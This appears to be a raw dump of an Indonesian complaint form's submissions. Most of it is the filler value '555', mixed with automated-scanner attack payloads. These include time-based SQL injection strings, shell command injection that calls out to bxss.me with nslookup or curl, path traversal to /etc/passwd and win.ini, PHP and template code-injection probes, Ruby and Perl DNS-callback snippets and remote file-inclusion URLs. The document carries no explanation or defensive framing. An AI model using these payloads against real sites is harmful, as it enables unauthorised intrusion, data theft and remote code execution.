555CwzkEn7F') OR 930=(SELECT 930 FROM PG_SLEEP(15))--
555
555AOFK4CKO')) OR 561=(SELECT 561 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555'"\'\"
555
@@SKfjA
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999097+9999752}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
AgbNhJ99
555
555
555
555
555
555
555
oKqEPT9N: tLWM5IcV
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n983627=v950545
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9778635*9402685)
555
555
555
555
555
555
'+response.write(9778635*9402685)+'
555
555
555
555
555
555
"+response.write(9778635*9402685)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hithh'.'cioxshrq07c9c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(89).ch
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitoh"."hehzktckc0cb5.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(70).ch
555
555
555
555
555
555
555
555
555
555
555
gethostbyname(lc('hitby'.'tuohkotsbc391.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(85).chr(
555
bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(108).concat(75).concat(107).concat(78)+(require"socket" Socke
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(106).concat(69).concat(99).concat(67)+(require'socket' Socket
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(100).concat(72).concat(101).concat(86)+(require'socket' Socket.
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
/etc/shells
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
555
c:/windows/win.ini
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
bxss.me
555
555
";print(md5(31337));$a="
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt?.jpg
555'"()&%
[removed]Oc6H(9253)[removed]
555
${@print(md5(31337))}
555
555
'"()&%
[removed]Oc6H(9907)[removed]
555
${@print(md5(31337))}\
555
555
5559600654
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*xftsty&&'
555
555
555
555"&&sleep(27*1000)*rpyqfg&&"
555
555
555
555
555'||sleep(27*1000)*ysbryn||'
555
555
555
555"||sleep(27*1000)*vimvsc||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo eglyud$()\ xwvhio\nz^xyu||a #' &echo eglyud$()\ xwvhio\nz^xyu||a #|" &echo eglyud$()\ xwvhio\nz
&echo jygqlb$()\ ukttje\nz^xyu||a #' &echo jygqlb$()\ ukttje\nz^xyu||a #|" &echo jygqlb$()\ ukttje\n
555
555&echo wkhasl$()\ qouqum\nz^xyu||a #' &echo wkhasl$()\ qouqum\nz^xyu||a #|" &echo wkhasl$()\ qouqu
|echo uqncoi$()\ xjcgfx\nz^xyu||a #' |echo uqncoi$()\ xjcgfx\nz^xyu||a #|" |echo uqncoi$()\ xjcgfx\n
555|echo wmgrdc$()\ omifma\nz^xyu||a #' |echo wmgrdc$()\ omifma\nz^xyu||a #|" |echo wmgrdc$()\ omifm
expr 9000176911 - 936746
(nslookup -q=cname hitfbtaquarwv127b3.bxss.me||curl hitfbtaquarwv127b3.bxss.me))
$(nslookup -q=cname hityixgxvadqca9ebb.bxss.me||curl hityixgxvadqca9ebb.bxss.me)
&nslookup -q=cname hitjllzqolroxb6fd0.bxss.me&'\"`0&nslookup -q=cname hitjllzqolroxb6fd0.bxss.me&`'
&(nslookup -q=cname hitplkgnabjut6a4cf.bxss.me||curl hitplkgnabjut6a4cf.bxss.me)&'\"`0&(nslookup -q=
|(nslookup -q=cname hitkqeejbzpytd444f.bxss.me||curl hitkqeejbzpytd444f.bxss.me)
`(nslookup -q=cname hitsnwscqpihv1f9cb.bxss.me||curl hitsnwscqpihv1f9cb.bxss.me)`
555
;(nslookup -q=cname hityrefhskode039b0.bxss.me||curl hityrefhskode039b0.bxss.me)|(nslookup -q=cname
|(nslookup${IFS}-q${IFS}cname${IFS}hitfispwpsmur54069.bxss.me||curl${IFS}hitfispwpsmur54069.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hituuniatlufm5aaf8.bxss.me||curl${IFS}hituuniatlufm5aaf8.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'r9saTuoY'='
-1" OR 5*5=25 or "ZFsgZpPd"="
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
555-1; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555
555Y4l4j78Z'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1 OR 338=(SELECT 338 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
cs86mZjB
555
555
555
555
555
555
xBIvPqaO: Rj9agBId
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9487024*9047762)
555
555
555
555
555
555
555
555
${9999863+9999625}
555
'+response.write(9487024*9047762)+'
555
555
555
555
"+response.write(9487024*9047762)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1) OR 830=(SELECT 830 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n905104=v919086
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1)) OR 998=(SELECT 998 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
'.gethostbyname(lc('hitpg'.'fxamfijt04813.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(73).ch
555
555
bxss.me/t/xss.html?
555
555
555
555
555
555
".gethostbyname(lc("hitqq"."wnhxnmxf29513.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(71).ch
555
555
555
555
555
555
555
555
gethostbyname(lc('hitse'.'gmqqkudy587f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(89).chr(1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555idMXCKTV' OR 135=(SELECT 135 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(71).concat(111).concat(87)+(require"socket" Socke
555
../555
xfs.bxss.me
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(97).concat(67).concat(104).concat(76)+(require'socket' Socket
555
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(99).concat(77).concat(103).concat(68)+(require'socket' Socket.g
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555ZCxAiWXB') OR 765=(SELECT 765 FROM PG_SLEEP(15))--
555
555
555
555
555
<!--
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
555
/etc/shells
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
../../../../../../../../../../../../../../etc/shells
555
';print(md5(31337));$a='
555
c:/windows/win.ini
555
555
";print(md5(31337));$a="
555
555
bxss.me
555
555
${@print(md5(31337))}
555
Http://bxss.me/t/fit.txt
555
555
${@print(md5(31337))}\
555
555
http://bxss.me/t/fit.txt?.jpg
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555'"()&%
[removed]paHE(9417)[removed]
555
555
555
555
555
555
555
'"()&%
[removed]paHE(9465)[removed]
555
555
555
5559043787
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555tMPSYklG')) OR 800=(SELECT 800 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555'&&sleep(27*1000)*hnjges&&'
555
555"&&sleep(27*1000)*lwdboy&&"
555
555'||sleep(27*1000)*ezfxgf||'
555
555
555
555"||sleep(27*1000)*jbtkwm||"
555
555
555
555
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555
555
555
555
555
555
echo ycnrrt$()\ fbgzoc\nz^xyu||a #' &echo ycnrrt$()\ fbgzoc\nz^xyu||a #|" &echo ycnrrt$()\ fbgzoc\nz
555
&echo fjhyhd$()\ hadmhd\nz^xyu||a #' &echo fjhyhd$()\ hadmhd\nz^xyu||a #|" &echo fjhyhd$()\ hadmhd\n
555
555&echo pggnfi$()\ zcovqr\nz^xyu||a #' &echo pggnfi$()\ zcovqr\nz^xyu||a #|" &echo pggnfi$()\ zcovq
555
555
|echo hylora$()\ wfpmxq\nz^xyu||a #' |echo hylora$()\ wfpmxq\nz^xyu||a #|" |echo hylora$()\ wfpmxq\n
555
555|echo ujnqyd$()\ dzeaoa\nz^xyu||a #' |echo ujnqyd$()\ dzeaoa\nz^xyu||a #|" |echo ujnqyd$()\ dzeao
expr 9000533955 - 947502
(nslookup -q=cname hityypfsqiisi5e4c4.bxss.me||curl hityypfsqiisi5e4c4.bxss.me))
$(nslookup -q=cname hityxfwwdgtjv0fc17.bxss.me||curl hityxfwwdgtjv0fc17.bxss.me)
&nslookup -q=cname hitcvazxrzgzmd9fb0.bxss.me&'\"`0&nslookup -q=cname hitcvazxrzgzmd9fb0.bxss.me&`'
&(nslookup -q=cname hitezxcmjiuck5c3ed.bxss.me||curl hitezxcmjiuck5c3ed.bxss.me)&'\"`0&(nslookup -q=
|(nslookup -q=cname hitvnzvuhlicg5731f.bxss.me||curl hitvnzvuhlicg5731f.bxss.me)
`(nslookup -q=cname hitxzwqilvmax85350.bxss.me||curl hitxzwqilvmax85350.bxss.me)`
;(nslookup -q=cname hityhnrzpfnwb5af65.bxss.me||curl hityhnrzpfnwb5af65.bxss.me)|(nslookup -q=cname
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
|(nslookup${IFS}-q${IFS}cname${IFS}hitjfrtyhdysse8400.bxss.me||curl${IFS}hitjfrtyhdysse8400.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitcrbgydxzhr78a18.bxss.me||curl${IFS}hitcrbgydxzhr78a18.bxss.me)
555
555'"
555
555
555'"\'\"
555
555
@@Q4p9W
555
555
(select 198766*667891)
555
555
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Lihat
FORM ADUAN
Your message has been sent. Thank you!
Kirim Pesan